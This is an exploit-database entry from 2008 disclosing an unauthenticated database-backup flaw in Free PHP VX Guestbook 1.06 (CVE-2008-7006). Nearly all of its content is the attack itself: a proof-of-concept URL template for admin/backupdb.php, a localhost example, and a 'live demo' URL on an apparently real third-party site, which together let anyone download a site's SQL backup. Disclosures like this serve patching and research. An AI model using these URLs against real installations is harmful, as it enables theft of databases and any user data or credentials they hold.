Free PHP VX Guestbook 1.06 - Arbitrary Database Backup

Author: SirGod
type: webapps
platform: php
port: 
date_added: 2008-09-12 
date_updated:  
verified: 1 
codes: OSVDB-48156;CVE-2008-7006 
tags: 
aliases:  
screenshot_url:  
application_url: 

###############################################################################################
[+] Free PHP VX Guestbook 1.06 Arbitrary Backup Database
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
################################################################################################

 [+] Arbitrary Backup Database

  Follow the example and the database download will begin :

   [dbname]_db_backup.sql


  PoC :

    http://[target]/[path]/admin/backupdb.php

  Example :

    http://127.0.0.1/book/admin/backupdb.php

  Live Demo :

    http://phpversion.com/book/admin/backupdb.php


################################################################################################

# milw0rm.com [2008-09-13]